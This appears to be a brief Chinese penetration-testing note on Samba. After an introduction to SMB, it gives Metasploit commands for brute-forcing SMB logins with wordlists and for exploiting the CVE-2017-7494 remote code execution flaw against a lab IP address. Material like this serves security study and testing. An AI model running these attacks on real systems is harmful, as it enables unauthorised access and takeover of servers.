Samba简介
Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成,Samba是面向Linux和Unix环境的Windows互操作性套件。它适用于在可能包括Linux、Unix、Windows、macOS及其他操作系统的异构环境下工作的那些人。Samba使用服务器消息块(SMB)协议,Windows系统使用该协议相互联系。使用Samba,你可以让Linux系统将驱动器映射到Windows系统,可以让Windows系统将驱动器映射到Linux系统,不过后者的可能性大得多。Samba让你可以在Linux系统上模拟文件和打印服务。
未授权访问
在samba服务未设置用户名及密码的情况下,可以直接在文件资源管理器访问samba地址
暴力破解
use auxiliary/scanner/smb/smb_login
auxiliary(smb_login) > show options
auxiliary(smb_login) > set RHOST 192.168.109.134
auxiliary(ssmb_login) > set USER_FILE /root/username.txt
auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt
auxiliary(ssmb_login) > exploit
远程代码执行漏洞(CVE-2017-7494 )
CVE-2017-7494影响范围为Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。
exploit/linux/samba/is_known_pipename
set RHOST 192.168.109.134
exploit
